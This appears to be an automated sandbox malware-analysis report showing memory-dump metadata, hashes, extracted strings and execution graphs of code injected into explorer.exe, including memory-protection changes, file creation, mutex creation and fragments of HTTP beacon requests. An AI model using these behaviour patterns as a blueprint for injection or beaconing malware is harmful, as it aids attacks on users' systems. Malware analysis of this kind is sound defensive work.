                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                                                        • Opcode ID: cb508ef37fc728b8096ef3e028ee7c59bb6f544b56260ef843f2cadb5d3c7352
                                                                                                                                                                                        • Instruction ID: d6bb77d537bd3648aa998eb9c11c44dc587d7d0b3585f733be21bfe09ec03778
                                                                                                                                                                                        • Opcode Fuzzy Hash: cb508ef37fc728b8096ef3e028ee7c59bb6f544b56260ef843f2cadb5d3c7352
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B219DB7A0021AABCF20AF69C845AEF77FC9B54718F044525FD0993141E7749E4487E1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A522F4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A522FC
                                                                                                                                                                                        • RTL: Resource at %p, xrefs: 00A5230B
                                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 00A52328
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                        • API String ID: 885266447-871070163
                                                                                                                                                                                        • Opcode ID: a5f426171e9ec92111c8af009bf8d53caab6adeec6e3a87efc6b9257e062754d
                                                                                                                                                                                        • Instruction ID: bc078cd4b3ea37bf1f36e0ac335b6404e313d09b480760471f64459251375ef3
                                                                                                                                                                                        • Opcode Fuzzy Hash: a5f426171e9ec92111c8af009bf8d53caab6adeec6e3a87efc6b9257e062754d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 87513872A00601ABDF119B38CD91FE773A8AF95360F104229FD59DF281EA71ED8587A0
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A524BD
                                                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A5248D
                                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 00A524FA
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                                                        • Opcode ID: 81707779f4f3c060aace60f4fa5c8c8eaa60559f430f8974253834cd8dc3780e
                                                                                                                                                                                        • Instruction ID: b99ecfd828adfe08bd586ffe1d9afe05dda3bab1bcaeec7f8d49c125c74b4ca3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 81707779f4f3c060aace60f4fa5c8c8eaa60559f430f8974253834cd8dc3780e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C41E671A04204ABCB24DBA8CD85FAB77B9FF85720F208605FA559B3C1D734E94587A1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: __fassign
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3965848254-0
                                                                                                                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                        • Instruction ID: 0f0a58029e786ebe93da45cd6288e49747fd665637cc1695c7a65f1e2cf717da
                                                                                                                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D919D31E0022AEFDF29CF9CD8456AEB7B4FF55305F20807AD811A61A2E7305B85CB91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                                        • String ID: $$0
                                                                                                                                                                                        • API String ID: 1302938615-389342756
                                                                                                                                                                                        • Opcode ID: 0c780d6b54e9493f885dc441b15e62713bf17fbe73c2c2786b3650260c4c2a6b
                                                                                                                                                                                        • Instruction ID: cbb4caa543866546bcb400e654a7895a122f87abfb6deaa1b4a1083670239a63
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c780d6b54e9493f885dc441b15e62713bf17fbe73c2c2786b3650260c4c2a6b
                                                                                                                                                                                        • Instruction Fuzzy Hash: C7919070D04A8AEFDF25CFB9C4453EEBBB1AF42320F14465AD8A1A72D1D3748A45CB58

                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:1%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                        Total number of Nodes:69
                                                                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                                                                        execution_graph 20229 610ce12 20233 610b942 20229->20233 20231 610ce45 NtProtectVirtualMemory 20232 610ce70 20231->20232 20234 610b967 20233->20234 20234->20231 20235 610b232 20236 610b25c 20235->20236 20238 610b334 20235->20238 20237 610b410 NtCreateFile 20236->20237 20236->20238 20237->20238 20239 610bf82 20240 610bfb8 20239->20240 20242 610c081 20240->20242 20244 610c022 20240->20244 20245 61085b2 20240->20245 20243 610c117 getaddrinfo 20242->20243 20242->20244 20243->20244 20246 610860a socket 20245->20246 20247 61085ec 20245->20247 20246->20242 20247->20246 20248 61068c2 20250 6106934 20248->20250 20249 61069a6 20250->20249 20251 6106995 ObtainUserAgentString 20250->20251 20251->20249 20252 610cbac 20253 610cbb1 20252->20253 20286 610cbb6 20253->20286 20287 6102b72 20253->20287 20255 610cc2c 20256 610cc85 20255->20256 20258 610cc54 20255->20258 20259 610cc69 20255->20259 20255->20286 20301 610aab2 NtProtectVirtualMemory 20256->20301 20297 610aab2 NtProtectVirtualMemory 20258->20297 20262 610cc80 20259->20262 20263 610cc6e 20259->20263 20260 610cc8d 20302 6104102 ObtainUserAgentString NtProtectVirtualMemory 20260->20302 20262->20256 20264 610cc97 20262->20264 20299 610aab2 NtProtectVirtualMemory 20263->20299 20268 610cc9c 20264->20268 20269 610ccbe 20264->20269 20266 610cc5c 20298 6103ee2 ObtainUserAgentString NtProtectVirtualMemory 20266->20298 20291 610aab2 NtProtectVirtualMemory 20268->20291 20273 610ccc7 20269->20273 20274 610ccd9 20269->20274 20269->20286 20271 610cc76 20300 6103fc2 ObtainUserAgentString NtProtectVirtualMemory 20271->20300 20303 610aab2 NtProtectVirtualMemory 20273->20303 20274->20286 20305 610aab2 NtProtectVirtualMemory 20274->20305 20277 610cccf 20304 61042f2 ObtainUserAgentString NtProtectVirtualMemory 20277->20304 20279 610ccac 20292 6103de2 ObtainUserAgentString 20279->20292 20281 610cce5 20306 6104712 ObtainUserAgentString NtProtectVirtualMemory 20281->20306 20284 610ccb4 20293 6100412 20284->20293 20289 6102b93 20287->20289 20288 6102cce 20288->20255 20289->20288 20290 6102cb5 CreateMutexExW 20289->20290 20290->20288 20291->20279 20292->20284 20295 6100440 20293->20295 20294 6100473 20294->20286 20295->20294 20296 610044d CreateThread 20295->20296 20296->20286 20297->20266 20298->20286 20299->20271 20300->20286 20301->20260 20302->20286 20303->20277 20304->20286 20305->20281 20306->20286 20307 61002dd 20308 610031a 20307->20308 20309 61003fa 20308->20309 20310 6100328 SleepEx 20308->20310 20314 610af12 socket NtCreateFile getaddrinfo 20308->20314 20315 6101432 NtCreateFile 20308->20315 20316 61000f2 socket getaddrinfo 20308->20316 20310->20308 20310->20310 20314->20308 20315->20308 20316->20308

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 291 610b232-610b256 292 610b25c-610b260 291->292 293 610b8bd-610b8cd 291->293 292->293 294 610b266-610b2a0 292->294 295 610b2a2-610b2a6 294->295 296 610b2bf 294->296 295->296 297 610b2a8-610b2ac 295->297 298 610b2c6 296->298 299 610b2b4-610b2b8 297->299 300 610b2ae-610b2b2 297->300 301 610b2cb-610b2cf 298->301 299->301 302 610b2ba-610b2bd 299->302 300->298 303 610b2d1-610b2f7 call 610b942 301->303 304 610b2f9-610b30b 301->304 302->301 303->304 308 610b378 303->308 304->308 309 610b30d-610b332 304->309 312 610b37a-610b3a0 308->312 310 610b3a1-610b3a8 309->310 311 610b334-610b33b 309->311 315 610b3d5-610b3dc 310->315 316 610b3aa-610b3d3 call 610b942 310->316 313 610b366-610b370 311->313 314 610b33d-610b360 call 610b942 311->314 313->308 318 610b372-610b373 313->318 314->313 320 610b410-610b458 NtCreateFile call 610b172 315->320 321 610b3de-610b40a call 610b942 315->321 316->308 316->315 318->308 327 610b45d-610b45f 320->327 321->308 321->320 327->308 328 610b465-610b46d 327->328 328->308 329 610b473-610b476 328->329 330 610b486-610b48d 329->330 331 610b478-610b481 329->331 332 610b4c2-610b4ec 330->332 333 610b48f-610b4b8 call 610b942 330->333 331->312 338 610b4f2-610b4f5 332->338 339 610b8ae-610b8b8 332->339 333->308 340 610b4be-610b4bf 333->340 341 610b604-610b611 338->341 342 610b4fb-610b4fe 338->342 339->308 340->332 341->312 343 610b500-610b507 342->343 344 610b55e-610b561 342->344 347 610b538-610b559 343->347 348 610b509-610b532 call 610b942 343->348 349 610b616-610b619 344->349 350 610b567-610b572 344->350 354 610b5e9-610b5fa 347->354 348->308 348->347 352 610b6b8-610b6bb 349->352 353 610b61f-610b626 349->353 355 610b5a3-610b5a6 350->355 356 610b574-610b59d call 610b942 350->356 357 610b739-610b73c 352->357 358 610b6bd-610b6c4 352->358 360 610b657-610b66b call 610ce92 353->360 361 610b628-610b651 call 610b942 353->361 354->341 355->308 363 610b5ac-610b5b6 355->363 356->308 356->355 368 610b742-610b749 357->368 369 610b7c4-610b7c7 357->369 365 610b6f5-610b734 358->365 366 610b6c6-610b6ef call 610b942 358->366 360->308 383 610b671-610b6b3 360->383 361->308 361->360 363->308 364 610b5bc-610b5e6 363->364 364->354 388 610b894-610b8a9 365->388 366->339 366->365 375 610b77a-610b7bf 368->375 376 610b74b-610b774 call 610b942 368->376 369->308 372 610b7cd-610b7d4 369->372 378 610b7d6-610b7f6 call 610b942 372->378 379 610b7fc-610b803 372->379 375->388 376->339 376->375 378->379 386 610b805-610b825 call 610b942 379->386 387 610b82b-610b835 379->387 383->312 386->387 387->339 393 610b837-610b83e 387->393 388->312 393->339 396 610b840-610b886 393->396 396->388
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                        • String ID: `
                                                                                                                                                                                        • API String ID: 823142352-2679148245
                                                                                                                                                                                        • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                        • Instruction ID: c27c11f2549f32434544a7427ea029df936cdf4523d4e3c63fe0eb6b0c597f0d
                                                                                                                                                                                        • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F226F70A18A099FDB99DF28C4996AEF7E1FB98301F50062EE05ED7290DF71E451CB81

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 442 610ce12-610ce6e call 610b942 NtProtectVirtualMemory 445 610ce70-610ce7c 442->445 446 610ce7d-610ce8f 442->446
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 0610CE67
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                                                                        • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                        • Instruction ID: 24b517428ce3fc5841dcf8f8a7cf560b8621d37775df17b4c7cf25e57f3df73e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                        • Instruction Fuzzy Hash: D101B130628B484F9B88EF6CD48112AB7E4FBDE314F000B3EE99AC3250EB74C5414B82

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 447 610ce0a-610ce38 448 610ce45-610ce6e NtProtectVirtualMemory 447->448 449 610ce40 call 610b942 447->449 450 610ce70-610ce7c 448->450 451 610ce7d-610ce8f 448->451 449->448
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 0610CE67
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                                                                        • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                        • Instruction ID: 3544ba64cdd51328859c22936b5075efeb684088b9764f10b0a4213d5d074435
                                                                                                                                                                                        • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D01A734628B884B9B84EB2C94411A6B7E5FBCE314F000B3EE59AC3240DB75D5014782

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 0 610bf82-610bfb6 1 610bfd6-610bfd9 0->1 2 610bfb8-610bfbc 0->2 4 610c8fe-610c90c 1->4 5 610bfdf-610bfed 1->5 2->1 3 610bfbe-610bfc2 2->3 3->1 6 610bfc4-610bfc8 3->6 7 610bff3-610bff7 5->7 8 610c8f6-610c8f7 5->8 6->1 11 610bfca-610bfce 6->11 9 610bff9-610bffd 7->9 10 610bfff-610c000 7->10 8->4 9->10 12 610c00a-610c010 9->12 10->12 11->1 13 610bfd0-610bfd4 11->13 14 610c012-610c020 12->14 15 610c03a-610c060 12->15 13->1 13->5 14->15 16 610c022-610c026 14->16 17 610c062-610c066 15->17 18 610c068-610c07c call 61085b2 15->18 16->8 19 610c02c-610c035 16->19 17->18 20 610c0a8-610c0ab 17->20 22 610c081-610c0a2 18->22 19->8 23 610c0b1-610c0b8 20->23 24 610c144-610c150 20->24 22->20 26 610c8ee-610c8ef 22->26 27 610c0e2-610c0f5 23->27 28 610c0ba-610c0dc call 610b942 23->28 25 610c156-610c165 24->25 24->26 29 610c167-610c178 call 6108552 25->29 30 610c17f-610c18f 25->30 26->8 27->26 32 610c0fb-610c101 27->32 28->27 29->30 34 610c191-610c1da call 6108732 30->34 35 610c1e5-610c21b 30->35 32->26 37 610c107-610c109 32->37 34->35 52 610c1dc-610c1e1 34->52 41 610c22d-610c231 35->41 42 610c21d-610c22b 35->42 37->26 38 610c10f-610c111 37->38 38->26 45 610c117-610c132 getaddrinfo 38->45 43 610c233-610c245 41->43 44 610c247-610c24b 41->44 47 610c27f-610c280 42->47 43->47 48 610c261-610c265 44->48 49 610c24d-610c25f 44->49 45->24 50 610c134-610c13c 45->50 51 610c283-610c2e0 call 610cd62 call 6109482 call 6108e72 call 610d002 47->51 53 610c267-610c26b 48->53 54 610c26d-610c279 48->54 49->47 50->24 63 610c2e2-610c2e6 51->63 64 610c2f4-610c354 call 610cd92 51->64 52->35 53->51 53->54 54->47 63->64 65 610c2e8-610c2ef call 6109042 63->65 69 610c35a-610c396 call 610cd62 call 610d262 call 610d002 64->69 70 610c48c-610c4b8 call 610cd62 call 610d262 64->70 65->64 85 610c398-610c3b7 call 610d262 call 610d002 69->85 86 610c3bb-610c3e9 call 610d262 * 2 69->86 79 610c4d9-610c590 call 610d262 * 3 call 610d002 * 2 call 6109482 70->79 80 610c4ba-610c4d5 70->80 111 610c595-610c5b9 call 610d262 79->111 80->79 85->86 101 610c415-610c41d 86->101 102 610c3eb-610c410 call 610d002 call 610d262 86->102 105 610c442-610c448 101->105 106 610c41f-610c425 101->106 102->101 105->111 112 610c44e-610c456 105->112 109 610c467-610c487 call 610d262 106->109 110 610c427-610c43d 106->110 109->111 110->111 121 610c5d1-610c6ad call 610d262 * 7 call 610d002 call 610cd62 call 610d002 call 6108e72 call 6109042 111->121 122 610c5bb-610c5cc call 610d262 call 610d002 111->122 112->111 113 610c45c-610c45d 112->113 113->109 132 610c6af-610c6b3 121->132 122->132 135 610c6b5-610c6fa call 6108382 call 61087b2 132->135 136 610c6ff-610c72d call 61086b2 132->136 152 610c8e6-610c8e7 135->152 143 610c75d-610c761 136->143 144 610c72f-610c735 136->144 149 610c767-610c76b 143->149 150 610c90d-610c913 143->150 144->143 148 610c737-610c74c 144->148 148->143 153 610c74e-610c754 148->153 154 610c771-610c773 149->154 155 610c8aa-610c8df call 61087b2 149->155 156 610c779-610c784 150->156 157 610c919-610c920 150->157 152->26 153->143 160 610c756 153->160 154->155 154->156 155->152 161 610c786-610c793 156->161 162 610c795-610c796 156->162 157->161 160->143 161->162 165 610c79c-610c7a0 161->165 162->165 167 610c7b1-610c7b2 165->167 168 610c7a2-610c7af 165->168 170 610c7b8-610c7c4 167->170 168->167 168->170 173 610c7f4-610c861 170->173 174 610c7c6-610c7ef call 610cd92 call 610cd62 170->174 185 610c8a3-610c8a4 173->185 186 610c863 173->186 174->173 185->155 186->185 188 610c865-610c86a 186->188 188->185 190 610c86c-610c872 188->190 190->185 192 610c874-610c8a1 190->192 192->185 192->186
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: getaddrinfo
                                                                                                                                                                                        • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                        • API String ID: 300660673-1117930895
                                                                                                                                                                                        • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                        • Instruction ID: d54a4605148fc7727a3eae5a9de1bbb18c0e7ddd2787a6cae02439d62f9aa8a2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                        • Instruction Fuzzy Hash: 24525330618A088BEBA9EF68D4947E9B7E1FF94300F50462ED4AFC7186DF70A545CB85

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ObtainUserAgentString.URLMON ref: 061069A0
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AgentObtainStringUser
                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                        • API String ID: 2681117516-319646191
                                                                                                                                                                                        • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                        • Instruction ID: f42813d50ee94addc445dfaff5e18f6305cf86ebb5fb5b575e3df5840d477353
                                                                                                                                                                                        • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                        • Instruction Fuzzy Hash: E5319171A14A4C8ADF84EFA8D8447EDBBE1FF98214F40422AE45ED7280DFB48645C789

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ObtainUserAgentString.URLMON ref: 061069A0
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AgentObtainStringUser
                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                        • API String ID: 2681117516-319646191
                                                                                                                                                                                        • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                        • Instruction ID: d5a373108d43ab29b95f0e0880d9e675697ae38df1e5d4498fc207c2d0ab977f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 17219370A14A4C8EDF85EFA8D8547ED7BA1FF98204F40421AE46AD7284DFB48645CBC9

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 234 6102b66-6102b68 235 6102b93-6102bb8 234->235 236 6102b6a-6102b71 234->236 238 6102bbb-6102c22 call 6109612 call 610b942 * 2 235->238 236->238 239 6102b73-6102b92 236->239 246 6102c28-6102c2b 238->246 247 6102cdc 238->247 239->235 246->247 249 6102c31-6102cb0 call 610dda4 call 610d022 call 610d3e2 call 610d022 call 610d3e2 246->249 248 6102cde-6102cf6 247->248 261 6102cb5-6102cca CreateMutexExW 249->261 262 6102cce-6102cd3 261->262 262->247 263 6102cd5-6102cda 262->263 263->248
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                                        • String ID: .dll$el32$kern
                                                                                                                                                                                        • API String ID: 1964310414-1222553051
                                                                                                                                                                                        • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                        • Instruction ID: 386352139d6a55c8010b10dd81181b4028c8b9e7a11c33a802155d4f9e114d2c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                        • Instruction Fuzzy Hash: D5413D70918A088FDF94EFA8C8987AD77E0FF98300F04456AD84EDB295DF749A45CB85

